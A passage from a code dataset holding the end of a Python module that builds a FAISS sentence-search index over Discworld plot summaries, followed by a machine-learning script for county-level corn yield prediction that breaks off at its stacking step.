BookText] = {}\n\n _plot_regex = re.compile(r\"(?:== (?:Plot|Synopsis)[^\\n]+$)\\s*(.+?)\\s*^== \", re.MULTILINE | re.S)\n\n class Config:\n arbitrary_types_allowed = True\n\n @classmethod\n def from_book_page_names(\n cls, name: str, book_page_names: List[str], sentence_splitter_model=None, encoder_model=None, limit: int = 0\n ):\n\n if limit > 0:\n book_page_names = book_page_names[:limit]\n\n logger.info(f\"Library {name} initialising from books with page names: {', '.join(book_page_names)}\")\n\n books = []\n for b in tqdm(book_page_names):\n book = Book.from_page(wikipedia.page(b, auto_suggest=False, redirect=False, preload=False))\n\n book.parse_plot()\n if not book.plot:\n logger.warning(f\"{book.name} has no plot, not adding it.\")\n continue\n\n book.parse_plot_paragraphs()\n book.parse_sentences(sentence_splitter_model)\n book.encode_sentences(encoder_model)\n books.append(book)\n\n if len(books) <= 0:\n raise ValueError(\"No books were added\")\n\n logger.success(\n f\"{len(books)} books loaded, parsed and encoded successfully: {', '.join(b.name for b in books)}\"\n )\n\n return Library(\n name=name,\n books=books,\n sentence_splitter_model=sentence_splitter_model,\n encoder_model=encoder_model,\n )\n\n def build_index(self):\n\n tensors = np.stack([book_sentences for book in self.books for book_sentences in book.plot_sentences_encoded])\n\n logger.info(f\"Building index from {tensors.shape[0]} sentences.\")\n\n tensor_id = 0\n for book in self.books:\n for sentence in book.plot_sentences:\n self.sentence_index_to_book_text[tensor_id] = BookText(book, sentence)\n tensor_id += 1\n\n index = faiss.IndexFlatL2(tensors.shape[1])\n index.add(tensors)\n\n assert index.is_trained\n\n logger.success(\n f\"Sentence index built, contains {tensors.shape[0]} sentences with {tensors.shape[1]} elements each.\"\n )\n self.sentence_index = index\n\n def save(self, path: Path = None):\n path = path or Path.home()\n path = path / f\"{self.name}.pkl\"\n\n logger.info(f\"Saving library to {path}\")\n with open(path, \"wb\") as f:\n pickle.dump(self, f, pickle.HIGHEST_PROTOCOL)\n logger.success(f\"Saved library to {path}\")\n\n @classmethod\n def load(cls, path: Path):\n logger.info(f\"Loading library from {path}\")\n\n with open(path, \"rb\") as f:\n library = pickle.load(f)\n\n logger.success(f\"Library {library.name} loaded!\")\n return library\n\n def search_interactive(self, k):\n logger.info(\n f\"Searching the {self.name} library interactively.\\n\"\n f\"Available books: {len(self.books)} – {', '.join(b.name for b in self.books)}\\n\"\n f\"Looking at {k} nearest neighbours.\"\n )\n\n while True:\n sentence = input(\"Input a sentence: \")\n\n sentence_encoded = self.encoder_model.encode(sentence)\n distances, indices = self.sentence_index.search(np.stack([sentence_encoded]), k)\n\n logger.debug(f\"distances: {distances}, indices: {indices}\")\n\n # we assume only one sentence query here:\n distances = distances[0]\n indices = indices[0]\n\n for rank in range(k):\n i = indices[rank]\n book, text = self.sentence_index_to_book_text[i]\n print(f\"{(rank + 1):>3}. 
{text}\")\n print(f\" – {book.name}, distance: {distances[rank]:.2f}\\n\")\n\n\ndef build_library(\n name: str = \"Discworld\",\n book_page_names: List[str] = SECTIONS[\"Discworld\"],\n sentence_splitter_model_name: str = \"en_core_web_sm\",\n encoder_model_name: str = \"all-mpnet-base-v2\",\n limit: int = 0,\n path: Path = None,\n):\n logger.info(f\"Loading sentence splitter model {sentence_splitter_model_name}\")\n sentence_splitter_model = spacy.load(sentence_splitter_model_name)\n\n logger.info(f\"Loading encoder model {encoder_model_name}\")\n encoder_model = SentenceTransformer(encoder_model_name)\n\n library = Library.from_book_page_names(\n name=name,\n book_page_names=book_page_names,\n sentence_splitter_model=sentence_splitter_model,\n encoder_model=encoder_model,\n limit=limit,\n )\n library.build_index()\n library.save(path=path)\n\n\ndef search_library(path: Path = Path.home() / \"Discworld.pkl\", k: int = 4):\n library = Library.load(path=path)\n\n library.search_interactive(k)\n\n\nif __name__ == \"__main__\":\n build_library()\n\n search_library()\n","repo_name":"MikulasZelinka/discworld-hex","sub_path":"src/discworld_hex/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":5430,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"1941098720","text":"\"\"\"\n@author: Mohsen\nML+APSIM for Corn Yield Prediction\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport random\nimport os\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder, MinMaxScaler\nfrom sklearn import linear_model\nfrom sklearn.linear_model import Lasso, ElasticNet, Ridge, LassoCV\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.neural_network import MLPRegressor\nfrom xgboost.sklearn import XGBRegressor\nfrom lightgbm import LGBMRegressor\nfrom scipy.optimize import minimize\nfrom sklearn.metrics import mean_squared_error as mse\nfrom sklearn.model_selection import cross_val_score, cross_val_predict, cross_validate, KFold\nfrom sklearn import metrics\nfrom sklearn.model_selection import RandomizedSearchCV, TimeSeriesSplit\nimport time\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.datasets import load_boston\nfrom sklearn.feature_selection import RFE\nimport warnings\nfrom scipy.io import loadmat\nfrom sklearn.model_selection import LeavePGroupsOut, GridSearchCV, GroupKFold\nfrom hyperopt import STATUS_OK\nfrom hyperopt import hp\nfrom hyperopt import tpe\nfrom hyperopt import Trials\nfrom hyperopt import fmin\nimport os\nfrom pathlib import Path\n\n\nwarnings.filterwarnings('ignore')\n\npd.set_option('display.max_columns', 500)\nnp.random.seed(1369)\npopulation = loadmat('INFO_POPULATION.mat')['INFO_POPULATION']\nprogress = loadmat('INFO_PROGRESS.mat')['INFO_PROGRESS']\nsoil = loadmat('INFO_SOIL.mat')['INFO_SOIL']\nYield = pd.DataFrame(loadmat('INFO_Yield.mat')['INFO_Yield'], columns =['year', 'state', 'county', 'yield'])\n\nweather = pd.read_parquet('main_weather_final.parquet')\nweather = weather[(weather.year >= 1984)&(weather.year <= 2018)]\nweather.state = weather.state.astype('int')\nweather.county = weather.county.astype('int')\nweather.year = weather.year.astype('int')\n\n# Constructing quarterly and cumulative weather features\nweather['prcp_Q2'] = 
weather.loc[:,'prcp_14':'prcp_26'].sum(axis=1)\nweather['prcp_Q3'] = weather.loc[:,'prcp_27':'prcp_39'].sum(axis=1)\nweather['prcp_Q4'] = weather.loc[:,'prcp_40':'prcp_52'].sum(axis=1)\nweather['prcp_Q1:Q2'] = weather.loc[:,'prcp_1':'prcp_26'].sum(axis=1)\nweather['prcp_Q1:Q3'] = weather.loc[:,'prcp_1':'prcp_39'].sum(axis=1)\nweather['prcp_Q1:Q4'] = weather.loc[:,'prcp_1':'prcp_52'].sum(axis=1)\n\nweather['tmax_Q2'] = weather.loc[:,'tmax_14':'tmax_26'].mean(axis=1)\nweather['tmax_Q3'] = weather.loc[:,'tmax_27':'tmax_39'].mean(axis=1)\nweather['tmax_Q4'] = weather.loc[:,'tmax_40':'tmax_52'].mean(axis=1)\nweather['tmax_Q1:Q2'] = weather.loc[:,'tmax_1':'tmax_26'].mean(axis=1)\nweather['tmax_Q1:Q3'] = weather.loc[:,'tmax_1':'tmax_39'].mean(axis=1)\nweather['tmax_Q1:Q4'] = weather.loc[:,'tmax_1':'tmax_52'].mean(axis=1)\n\nweather['tmin_Q2'] = weather.loc[:,'tmin_14':'tmin_26'].mean(axis=1)\nweather['tmin_Q3'] = weather.loc[:,'tmin_27':'tmin_39'].mean(axis=1)\nweather['tmin_Q4'] = weather.loc[:,'tmin_40':'tmin_52'].mean(axis=1)\nweather['tmin_Q1:Q2'] = weather.loc[:,'tmin_1':'tmin_26'].mean(axis=1)\nweather['tmin_Q1:Q3'] = weather.loc[:,'tmin_1':'tmin_39'].mean(axis=1)\nweather['tmin_Q1:Q4'] = weather.loc[:,'tmin_1':'tmin_52'].mean(axis=1)\n\nweather['gddf_Q2'] = weather.loc[:,'gddf_14':'gddf_26'].sum(axis=1)\nweather['gddf_Q3'] = weather.loc[:,'gddf_27':'gddf_39'].sum(axis=1)\nweather['gddf_Q4'] = weather.loc[:,'gddf_40':'gddf_52'].sum(axis=1)\nweather['gddf_Q1:Q2'] = weather.loc[:,'gddf_1':'gddf_26'].sum(axis=1)\nweather['gddf_Q1:Q3'] = weather.loc[:,'gddf_1':'gddf_39'].sum(axis=1)\nweather['gddf_Q1:Q4'] = weather.loc[:,'gddf_1':'gddf_52'].sum(axis=1)\n\nweather['srad_Q2'] = weather.loc[:,'srad_14':'srad_26'].sum(axis=1)\nweather['srad_Q3'] = weather.loc[:,'srad_27':'srad_39'].sum(axis=1)\nweather['srad_Q4'] = weather.loc[:,'srad_40':'srad_52'].sum(axis=1)\nweather['srad_Q1:Q2'] = weather.loc[:,'srad_1':'srad_26'].sum(axis=1)\nweather['srad_Q1:Q3'] = weather.loc[:,'srad_1':'srad_39'].sum(axis=1)\nweather['srad_Q1:Q4'] = weather.loc[:,'srad_1':'srad_52'].sum(axis=1)\n\n\n# Removing weather data after harvesting and before next planting date\nidx = list(['state', 'county', 'year']) + \\\n list(weather.loc[:,'prcp_16':'prcp_43'].columns) + \\\n list(weather.loc[:,'tmax_16':'tmax_43'].columns) + \\\n list(weather.loc[:,'tmin_16':'tmin_43'].columns) + \\\n list(weather.loc[:,'gddf_16':'gddf_43'].columns) + \\\n list(weather.loc[:,'srad_16':'srad_43'].columns) + \\\n list(weather.loc[:, 'prcp_Q2':])\nweather = weather[idx]\n\n\ncv = 10\n\n# Importing APSIM variables\ndata_d = pd.read_csv('data_all_apsim.csv', index_col=0)\n\n\n\n## ----------------- data preprocessing ----------------- ##\n\n\n# Feature construction (trend)\ndata_d['yield_trend'] = 0\nfor s in data_d.State.unique():\n for c in data_d[data_d.State==s].County.unique():\n y1 = pd.DataFrame(data_d.Yield[(data_d.Year<2018) & ((data_d.State).astype('int') == s) & ((data_d.County).astype('int') == c)])\n x1 = pd.DataFrame(data_d.Year[(data_d.Year<2018) & ((data_d.State).astype('int') == s) & ((data_d.County).astype('int') == c)])\n regressor = LinearRegression()\n regressor.fit(x1, y1)\n data_d.loc[(data_d.Year<2018)&(data_d.State==s)&(data_d.County==c),'yield_trend'] = regressor.predict(x1)\n if len(data_d.Year[(data_d.Year==2018)&(data_d.State==s)&(data_d.County==c)].unique()) != 0:\n data_d.loc[(data_d.Year==2018)&(data_d.State==s)&(data_d.County==c),'yield_trend'] = regressor.predict(pd.DataFrame([2018]))\n\n# Joining the APSIM, soil 
and progress variables together\ndata = pd.concat([data_d,pd.DataFrame(progress[:,12:25])], axis=1)\ndata = pd.concat([data,pd.DataFrame(soil)],axis=1)\n\n# dropping rows with na values (years before 1984)\ndata = data.dropna()\ndata = data.reset_index(drop=True)\n\n# renaming columns\nprogress_names = ['Progress_' + str(i) for i in range(1,14)]\nsoil_names = ['Soil_' + str(i) for i in range(1,181)]\nnames = [progress_names, soil_names]\nnames = [item for sublist in names for item in sublist]\ncol_names = data.columns.values\ncol_names[1:4] = ['year', 'state', 'county']\ncol_names[28:] = names\ndata.columns = col_names\n\n# Joining weather variables\ndata = pd.merge(data, weather , on=['year','state','county'])\n\n# Scaling the variables\ndata = data.rename(columns = {'year':'Year'})\ncolumns_to_scale = data.drop(columns=['Yield','Year','state','county']).columns.values\nscaler = MinMaxScaler()\nscaled_columns = scaler.fit_transform(data[columns_to_scale])\nscaled_columns = pd.DataFrame(scaled_columns, columns=columns_to_scale)\n\ndata2 = pd.DataFrame(data.Yield)\ndata = pd.concat([data2, data.Year, scaled_columns], axis=1)\n\n# Splitting the data set to test and train\ntest = data[data.Year==2018]\ntrain = data[data.Year!=2018]\n\nx_test = test.drop(columns=['Yield'])\ny_test = test.Yield\n\nX = train.drop(columns=['Yield'])\nX = X.reset_index(drop=True)\nY = train.Yield\nY.reset_index(inplace=True, drop=True)\n\n\n# feature selection with random forest\nrf = RandomForestRegressor(n_estimators=100)\nrf.fit(X, Y)\n\nfrom eli5.sklearn import PermutationImportance\n\nperm = PermutationImportance(rf, cv=cv, n_iter=10).fit(X, Y)\nfeature_importances = [(feature, importance) for feature, importance in zip(list(X.columns), list(np.abs(perm.feature_importances_)))]\nfeature_importances = pd.DataFrame(sorted(feature_importances, key = lambda x: x[1], reverse = True))\nselected_features = feature_importances.iloc[0:80,:][0]\nif np.isin('Year', selected_features)==False:\n selected_features = selected_features.append(pd.Series('Year'))\nX = X.loc[:,selected_features]\nx_test = x_test.loc[:,selected_features]\nselected_features.to_csv('RF_features_2018.csv')\n\n\n# CV\nkf = KFold(cv)\n\n\n\n ## ---------------- Bayesian Search ---------------- ##\n\n\nmax_evals = 20\n\ndef objective_LASSO(params):\n LASSO_df_B = pd.DataFrame()\n L1_B = Lasso()\n for train_index, test_index in kf.split(X):\n LASSO_B = L1_B.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n LASSO_df_B = pd.concat([LASSO_df_B, pd.DataFrame(LASSO_B.predict(np.array(X.drop(columns='Year'))[test_index]))])\n loss_LASSO = mse(data_d.Yield[(data_d.Year < 2018)], LASSO_df_B)\n return {'loss': loss_LASSO, 'params': params, 'status': STATUS_OK}\n\nspace_LASSO = {'alpha': hp.uniform('alpha', 10**-5, 1)}\ntpe_algorithm = tpe.suggest\ntrials_LASSO = Trials()\nbest_LASSO = fmin(fn=objective_LASSO, space=space_LASSO, algo=tpe.suggest,\n max_evals=max_evals, trials=trials_LASSO, rstate=np.random.RandomState(1369))\nLASSO_param_B = pd.DataFrame({'alpha': []})\nfor i in range(max_evals):\n LASSO_param_B.alpha[i] = trials_LASSO.results[i]['params']['alpha']\nLASSO_param_B = pd.DataFrame(LASSO_param_B.alpha)\n\n\n\ndef objective_XGB(params):\n XGB_df_B = pd.DataFrame()\n X1_B = XGBRegressor(objective='reg:squarederror', **params)\n for train_index, test_index in kf.split(X):\n XGB_B = X1_B.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n XGB_df_B = pd.concat([XGB_df_B, 
pd.DataFrame(X1_B.predict(np.array(X.drop(columns='Year'))[test_index]))])\n loss_XGB = mse(data_d.Yield[(data_d.Year < 2018)], XGB_df_B)\n return {'loss': loss_XGB, 'params': params, 'status': STATUS_OK}\n\nspace_XGB = {'gamma': hp.uniform('gamma', 0, 1),\n 'learning_rate': hp.uniform('learning_rate', 0.001, 0.5),\n 'n_estimators': hp.choice('n_estimators', [100, 300, 500, 1000]),\n 'max_depth': hp.choice('max_depth', [int(x) for x in np.arange(3, 20, 1)])}\ntpe_algorithm = tpe.suggest\ntrials_XGB = Trials()\nbest_XGB = fmin(fn=objective_XGB, space=space_XGB, algo=tpe.suggest,\n max_evals=max_evals, trials=trials_XGB, rstate=np.random.RandomState(1369))\nXGB_param_B = pd.DataFrame({'gamma': [], 'learning_rate': [], 'n_estimators': [], 'max_depth': []})\nfor i in range(max_evals):\n XGB_param_B.gamma[i] = trials_XGB.results[i]['params']['gamma']\n XGB_param_B.learning_rate[i] = trials_XGB.results[i]['params']['learning_rate']\n XGB_param_B.n_estimators[i] = trials_XGB.results[i]['params']['n_estimators']\n XGB_param_B.max_depth[i] = trials_XGB.results[i]['params']['max_depth']\nXGB_param_B = pd.DataFrame({'gamma': XGB_param_B.gamma,\n 'learning_rate': XGB_param_B.learning_rate,\n 'n_estimators': XGB_param_B.n_estimators,\n 'max_depth': XGB_param_B.max_depth})\n\n\ndef objective_LGB(params):\n LGB_df_B = pd.DataFrame()\n G1_B = LGBMRegressor(objective='regression', **params)\n for train_index, test_index in kf.split(X):\n LGB_B = G1_B.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n LGB_df_B = pd.concat([LGB_df_B, pd.DataFrame(G1_B.predict(np.array(X.drop(columns='Year'))[test_index]))])\n loss_LGB = mse(data_d.Yield[(data_d.Year < 2018)], LGB_df_B)\n return {'loss': loss_LGB, 'params': params, 'status': STATUS_OK}\n\nspace_LGB = {'num_leaves': hp.choice('num_leaves', [int(x) for x in np.arange(5, 40, 2)]),\n 'learning_rate': hp.uniform('learning_rate', 0.1, 0.5),\n 'n_estimators': hp.choice('n_estimators', [500, 1000, 1500, 2000])}\ntpe_algorithm = tpe.suggest\ntrials_LGB = Trials()\nbest_LGB = fmin(fn=objective_LGB, space=space_LGB, algo=tpe.suggest,\n max_evals=max_evals, trials=trials_LGB, rstate=np.random.RandomState(1369))\nLGB_param_B = pd.DataFrame({'num_leaves': [], 'learning_rate': [], 'n_estimators': []})\nfor i in range(max_evals):\n LGB_param_B.num_leaves[i] = trials_LGB.results[i]['params']['num_leaves']\n LGB_param_B.learning_rate[i] = trials_LGB.results[i]['params']['learning_rate']\n LGB_param_B.n_estimators[i] = trials_LGB.results[i]['params']['n_estimators']\nLGB_param_B = pd.DataFrame({'num_leaves': LGB_param_B.num_leaves,\n 'learning_rate': LGB_param_B.learning_rate,\n 'n_estimators': LGB_param_B.n_estimators})\n\n\ndef objective_RF(params):\n RF_df_B = pd.DataFrame()\n R1_B = RandomForestRegressor(**params)\n for train_index, test_index in kf.split(X):\n RF_B = R1_B.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n RF_df_B = pd.concat([RF_df_B, pd.DataFrame(R1_B.predict(np.array(X.drop(columns='Year'))[test_index]))])\n loss_RF = mse(data_d.Yield[(data_d.Year < 2018)], RF_df_B)\n return {'loss': loss_RF, 'params': params, 'status': STATUS_OK}\n\nspace_RF = {'n_estimators': hp.choice('n_estimators', [100, 200, 300, 500]),\n 'max_depth': hp.choice('max_depth', [int(x) for x in np.arange(5, 41, 5)])}\ntpe_algorithm = tpe.suggest\ntrials_RF = Trials()\nbest_RF = fmin(fn=objective_RF, space=space_RF, algo=tpe.suggest,\n max_evals=max_evals, trials=trials_RF, rstate=np.random.RandomState(1369))\nRF_param_B = 
pd.DataFrame({'n_estimators': [], 'max_depth': []})\nfor i in range(max_evals):\n RF_param_B.n_estimators[i] = trials_RF.results[i]['params']['n_estimators']\n RF_param_B.max_depth[i] = trials_RF.results[i]['params']['max_depth']\nRF_param_B = pd.DataFrame({'n_estimators': RF_param_B.n_estimators,\n 'max_depth': RF_param_B.max_depth})\n\n\n## ---------------- Permutation feature importance ---------------- ##\n\n\ndef perm_fi(model, cv, n_iter):\n perm = PermutationImportance(model, cv=cv, n_iter=n_iter).fit(X.drop(columns='Year'), Y)\n feature_importances = [(feature, importance) for feature, importance in zip(list(X.columns), list(np.abs(perm.feature_importances_)))]\n feature_importances = pd.DataFrame(sorted(feature_importances, key = lambda x: x[1], reverse = True))\n return feature_importances\n\n\n## ---------------- Building models ---------------- ##\nLASSO_df2 = pd.DataFrame()\nL2 = Lasso(alpha=trials_LASSO.best_trial['result']['params']['alpha'], random_state=1369)\nfor train_index, test_index in kf.split(X):\n L2.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n LASSO_df2 = pd.concat([LASSO_df2, pd.DataFrame(L2.predict(np.array(X.drop(columns='Year'))[test_index]))])\nLASSO_df2 = LASSO_df2.reset_index(drop=True)\nLASSO_mse2 = mse(data_d.Yield[(data_d.Year<2018)], LASSO_df2)\nLASSO = L2.fit(X.drop(columns='Year'), Y)\nLASSO_preds_test2 = LASSO.predict(x_test.drop(columns='Year'))\npd.DataFrame(LASSO_preds_test2).to_csv('LASSO_preds_test_2018.csv')\nLASSO_mse_test2 = mse(data_d.Yield[data_d.Year==2018], LASSO_preds_test2)\nLASSO_rmse_test2 = np.sqrt(LASSO_mse_test2)\nLASSO_preds_train = LASSO.predict(X.drop(columns='Year'))\npd.DataFrame(LASSO_preds_train).to_csv('LASSO_preds_train_2018.csv')\nLASSO_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], LASSO_preds_train))\nfeature_importances_lasso = perm_fi(L2, cv, 10)\nfeature_importances_lasso.to_csv('feature_importances_lasso_2018.csv')\n\n\n\n### ---------- XGB ------------ ###\nXGB_df2 = pd.DataFrame()\nX2 = XGBRegressor(objective='reg:squarederror',\n gamma=trials_XGB.best_trial['result']['params']['gamma'],\n learning_rate=trials_XGB.best_trial['result']['params']['learning_rate'],\n n_estimators=int(trials_XGB.best_trial['result']['params']['n_estimators']),\n max_depth=int(trials_XGB.best_trial['result']['params']['max_depth']), random_state=1369)\nfor train_index, test_index in kf.split(X):\n X2.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n XGB_df2 = pd.concat([XGB_df2, pd.DataFrame(X2.predict(np.array(X.drop(columns='Year'))[test_index]))])\nXGB_df2 = XGB_df2.reset_index(drop=True)\nXGB_mse2 = mse(data_d.Yield[(data_d.Year<2018)], XGB_df2)\nXGB = X2.fit(X.drop(columns='Year'), Y)\nXGB_preds_test2 = XGB.predict(x_test.drop(columns='Year'))\npd.DataFrame(XGB_preds_test2).to_csv('XGB_preds_test_2018.csv')\nXGB_mse_test2 = mse(data_d.Yield[data_d.Year==2018], XGB_preds_test2)\nXGB_rmse_test2 = np.sqrt(XGB_mse_test2)\nXGB_preds_train = XGB.predict(X.drop(columns='Year'))\npd.DataFrame(XGB_preds_train).to_csv('XGB_preds_train_2018.csv')\nXGB_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], XGB_preds_train))\nperm_xgb = PermutationImportance(X2, cv=cv, n_iter=10).fit(X.as_matrix(), Y.as_matrix())\nfeature_importances_xgb = [(feature, importance) for feature, importance in\n zip(list(X.columns), list(np.abs(perm_xgb.feature_importances_)))]\nfeature_importances_xgb = pd.DataFrame(sorted(feature_importances_xgb, key=lambda x: x[1], 
reverse=True))\nfeature_importances_xgb.to_csv('feature_importances_xgb_2018.csv')\n\n\n### ---------- LGB ------------ ###\nLGB_df2 = pd.DataFrame()\nG2 = LGBMRegressor(objective='regression', random_state=1369,\n num_leaves=int(trials_LGB.best_trial['result']['params']['num_leaves']),\n learning_rate=trials_LGB.best_trial['result']['params']['learning_rate'],\n n_estimators=int(trials_LGB.best_trial['result']['params']['n_estimators']))\nfor train_index, test_index in kf.split(X):\n G2.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n LGB_df2 = pd.concat([LGB_df2, pd.DataFrame(G2.predict(np.array(X.drop(columns='Year'))[test_index]))])\nLGB_df2 = LGB_df2.reset_index(drop=True)\nLGB_mse2 = mse(data_d.Yield[(data_d.Year<2018)], LGB_df2)\nLGB = G2.fit(X.drop(columns='Year'), Y)\nLGB_preds_test2 = LGB.predict(x_test.drop(columns='Year'))\npd.DataFrame(LGB_preds_test2).to_csv('LGB_preds_test_2018.csv')\nLGB_mse_test2 = mse(data_d.Yield[data_d.Year==2018], LGB_preds_test2)\nLGB_rmse_test2 = np.sqrt(LGB_mse_test2)\nLGB_preds_train = LGB.predict(X.drop(columns='Year'))\npd.DataFrame(LGB_preds_train).to_csv('LGB_preds_train_2018.csv')\nLGB_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], LGB_preds_train))\nfeature_importances_lgb = perm_fi(G2, cv, 10)\nfeature_importances_lgb.to_csv('feature_importances_lgb_2018.csv')\n\n\n### ---------- RF ------------ ###\nRF_df2 = pd.DataFrame()\nR2 = RandomForestRegressor(max_depth=int(trials_RF.best_trial['result']['params']['max_depth']),\n n_estimators=int(trials_RF.best_trial['result']['params']['n_estimators']), random_state=1369)\nfor train_index, test_index in kf.split(X):\n R2.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n RF_df2 = pd.concat([RF_df2, pd.DataFrame(R2.predict(np.array(X.drop(columns='Year'))[test_index]))])\nRF_df2 = RF_df2.reset_index(drop=True)\nRF_mse2 = mse(data_d.Yield[(data_d.Year<2018)], RF_df2)\nRF = R2.fit(X.drop(columns='Year'), Y)\nRF_preds_test2 = RF.predict(x_test.drop(columns='Year'))\npd.DataFrame(RF_preds_test2).to_csv('RF_preds_test_2018.csv')\nRF_mse_test2 = mse(data_d.Yield[data_d.Year==2018], RF_preds_test2)\nRF_rmse_test2 = np.sqrt(RF_mse_test2)\nRF_preds_train = RF.predict(X.drop(columns='Year'))\npd.DataFrame(RF_preds_train).to_csv('RF_preds_train_2018.csv')\nRF_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], RF_preds_train))\nfeature_importances_rf = perm_fi(R2, cv, 10)\nfeature_importances_rf.to_csv('feature_importances_rf_2018.csv')\n\n\n### ---------- LR ------------ ###\nLR_df2 = pd.DataFrame()\nlm2 = LinearRegression()\nlm2.fit(X.drop(columns='Year'),Y)\nfor train_index, test_index in kf.split(X):\n lm2.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n LR_df2 = pd.concat([LR_df2, pd.DataFrame(lm2.predict(np.array(X.drop(columns='Year'))[test_index]))])\nLR_df2 = LR_df2.reset_index(drop=True)\nLR_mse2 = mse(data_d.Yield[(data_d.Year<2018)], LR_df2)\nLR = lm2.fit(X.drop(columns='Year'), Y)\nLR_preds_test2 = LR.predict(x_test.drop(columns='Year'))\npd.DataFrame(LR_preds_test2).to_csv('LR_preds_test2_2018.csv')\nLR_mse_test2 = mse(data_d.Yield[data_d.Year==2018], LR_preds_test2)\nLR_rmse_test2 = np.sqrt(LR_mse_test2)\nLR_preds_train = LR.predict(X.drop(columns='Year'))\npd.DataFrame(LR_preds_train).to_csv('LR_preds_train_2018.csv')\nLR_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], LR_preds_train))\nfeature_importances_lr = perm_fi(lm2, cv, 
10)\nfeature_importances_lr.to_csv('feature_importances_lr_2018.csv')\n\n\n\n## ---------------- Optimizing Ensembles ---------------- ##\n\ndef objective2(y):\n return mse(data_d.Yield[(data_d.Year<2018)],\n (y[0]*LASSO_df2 + y[1]*XGB_df2 + y[2]*LGB_df2 + y[3]*RF_df2 + y[4]*LR_df2))\n\ndef constraint12(y):\n return y[0] + y[1] + y[2] + y[3] + y[4] - 1.0\ndef constraint22(y):\n return LASSO_mse2 - objective2(y)\ndef constraint32(y):\n return XGB_mse2 - objective2(y)\ndef constraint42(y):\n return LGB_mse2 - objective2(y)\ndef constraint52(y):\n return RF_mse2 - objective2(y)\ndef constraint62(y):\n return LR_mse2 - objective2(y)\n\n\ny0 = np.zeros(5)\ny0[0] = 1 / 5\ny0[1] = 1 / 5\ny0[2] = 1 / 5\ny0[3] = 1 / 5\ny0[4] = 1 / 5\n\nb = (0, 1.0)\nbnds2 = (b, b, b, b, b)\ncon12 = {'type': 'eq', 'fun': constraint12}\ncon22 = {'type': 'ineq', 'fun': constraint22}\ncon32 = {'type': 'ineq', 'fun': constraint32}\ncon42 = {'type': 'ineq', 'fun': constraint42}\ncon52 = {'type': 'ineq', 'fun': constraint52}\ncon62 = {'type': 'ineq', 'fun': constraint62}\n\ncons2 = [con12, con22, con32, con42, con52, con62]\n\nsolution2 = minimize(objective2, y0, method='SLSQP',\n options={'disp': True, 'maxiter': 3000, 'eps': 1e-3}, bounds=bnds2,\n constraints=cons2)\ny = solution2.x\n\ncowe_preds_test = y[0]*LASSO_preds_test2 + y[1]*XGB_preds_test2 + y[2]*LGB_preds_test2 + y[3]*RF_preds_test2 + y[4]*LR_preds_test2\ncowe_mse_test = mse(data_d.Yield[data_d.Year==2018], cowe_preds_test)\ncowe_rmse_test = np.sqrt(cowe_mse_test)\npd.DataFrame(cowe_preds_test).to_csv('cowe_preds_test_2018.csv')\ncowe_preds_train = y[0]*LASSO_preds_train + y[1]*XGB_preds_train + y[2]*LGB_preds_train + y[3]*RF_preds_train + y[4]*LR_preds_train\npd.DataFrame(cowe_preds_train).to_csv('cowe_preds_train_2018.csv')\ncowe_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], cowe_preds_train))\n\n\ncowe_preds_CV = y[0]*LASSO_df2 + y[1]*XGB_df2 + y[2]*LGB_df2 + y[3]*RF_df2 + y[4]*LR_df2\ncowe_mse_CV = mse(data_d.Yield[(data_d.Year<2018)], cowe_preds_CV)\ncowe_rmse_CV = np.sqrt(cowe_mse_CV)\n\n\ncls_preds_test = y0[0]*LASSO_preds_test2 + y0[1]*XGB_preds_test2 + y0[2]*LGB_preds_test2 + y0[3]*RF_preds_test2 + y0[4]*LR_preds_test2\ncls_mse_test = mse(data_d.Yield[data_d.Year==2018], cls_preds_test)\ncls_rmse_test = np.sqrt(cls_mse_test)\npd.DataFrame(cls_preds_test).to_csv('cls_preds_test_2018.csv')\ncls_preds_train = y0[0]*LASSO_preds_train + y0[1]*XGB_preds_train + y0[2]*LGB_preds_train + y0[3]*RF_preds_train + y0[4]*LR_preds_train\npd.DataFrame(cls_preds_train).to_csv('cls_preds_train_2018.csv')\ncls_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], cls_preds_train))\n\n\ncls_preds_CV = y0[0]*LASSO_df2 + y0[1]*XGB_df2 + y0[2]*LGB_df2 + y0[3]*RF_df2 + y0[4]*LR_df2\ncls_mse_CV = mse(data_d.Yield[(data_d.Year<2018)], cls_preds_CV)\ncls_rmse_CV = np.sqrt(cls_mse_CV)\n\n\n\n## -------------------------------- STACKING -------------------------------- ##\n\npredsDF2 = pd.DataFrame()\npredsDF2['LASSO'] = LASSO_df2[0]\npredsDF2['XGB']= XGB_df2[0]\npredsDF2['LGB'] = LGB_df2[0]\npredsDF2['RF'] = RF_df2[0]\npredsDF2['LR'] = LR_df2[0]\npredsDF2['Y'] = data_d.Yield[(data_d.Year < 2018)].reset_index(drop=True)\nx_stacked2 = predsDF2.drop(columns='Y', axis=1)\ny_stacked2 = predsDF2['Y']\ntestPreds2 = pd.DataFrame([LASSO_preds_test2, XGB_preds_test2, LGB_preds_test2, RF_preds_test2, LR_preds_test2]).T\ntestPreds2.columns = ['LASSO', 'XGB', 'LGB', 'RF', 'LR']\n\n\nstck_reg2 = 